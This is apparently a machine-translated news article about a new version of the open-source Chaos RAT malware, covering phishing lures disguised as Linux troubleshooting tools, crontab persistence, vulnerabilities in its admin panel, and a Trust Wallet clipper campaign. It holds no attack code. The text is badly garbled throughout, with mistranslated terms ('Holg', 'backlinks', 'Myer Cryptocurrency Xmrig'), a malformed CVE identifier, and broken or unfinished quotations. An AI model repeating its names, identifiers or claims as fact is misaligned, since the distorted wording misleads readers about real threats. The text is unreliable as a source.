Flying -Pogrosis pay attention to the new version of the Trojan Remote Access (Rat) called Chaos rat This is used in recent attacks on Windows and Linux Systems.
According to Acronis findings, Artifact malicious programs may have been distributed by cheating on the victims in loading utilities for linux trouble.
“Chaos Rat is an open source rat written in Holg, which offers transverse platform support for both Windows and Linux Systems” – Note In a report that shared with Hacker News.
“Inspired by popular frames such as Cobalt Strike and Sliver, Chaos Rat provides an administrative panel where users can build useful loads, install sessions and control compromise machines.”
While working on the “remote administration tool” began in 2017, it did not attract attention until December 2022When it was used in a malicious company aimed at public web applications located on Linux Systems with Myer Cryptocurrency Xmrig.
After installation, the malicious software is connected to the external server and waiting for commands that allow you to launch backlinks, download/download/delete files, list files and directories, make screenshots, collect information about the system, block/restart/enter the machine and open arbitrary URL. The latest version of Chaos Rat – 5.0.3, which was released on May 31, 2024.
Acronis said that Linux malware variants have been found in the wild, often due to cryptocurrency mining companies. The networks observed by the company indicate that chaos rat is distributed by the victims through phishing -leaves containing malicious links or attachments.
These artifacts are designed to abandon the malicious script that can change the task planner “/ETC/CRONTAB” to periodically bring malicious software as a way to customize perseverance.
“Early companies used this technique to deliver miners of cryptocurrencies and rats chaos separately, indicating that the chaos was mostly used for exploration and collection of information on compromised devices,” the researchers said.
Analysis A Last sample Loaded to Virustotal in January 2025 from India called “Networkanalyzer.gz”, caused users to fool the download of malware, masking it as a troubleshoot utilities for the Linux environment.
In addition, an administrator panel that allows users to build useful loads and managed machinery was found susceptible to the vulnerability of the team’s introduction (Cve-2014-30850CVSS assessment: 8.8), which can be combined with a shortage of the transverse site (Cve-2024-31839CVSS’s assessment: 4.8) to Complete the arbitrary code On the server with increased privileges. Both vulnerabilities have since been addressed to the support of the rat as of May 2024.
Although it is currently unclear who is behind the use of rats in real attacks, development again illustrates how the actors threaten continue to equip tools with open source in their favor and confuse the attribution efforts.
“What begins as a developer’s tool can quickly become an actor’s choice tool,” the researchers said. “The use of public malware helps APT groups fit into the noise of everyday cybercrime. Open source malicious software offers a” good “tool that can be quickly customized and deployed. If several actors use the same malware with open signs.”
The disclosure of information coincides with the advent of a new company that focuses on Trust’s wallet users on a desktop with counterfeit versions that are distributed by deceptive links to loading Malicious software for Clipper.
“After installation, malicious software can scan your wallet files, data intercourse or monitoring sessions for your browser to fix seminal phrases or private keys,” Point Wild Rescare Cedar S Pandit – Note In a report published this week.
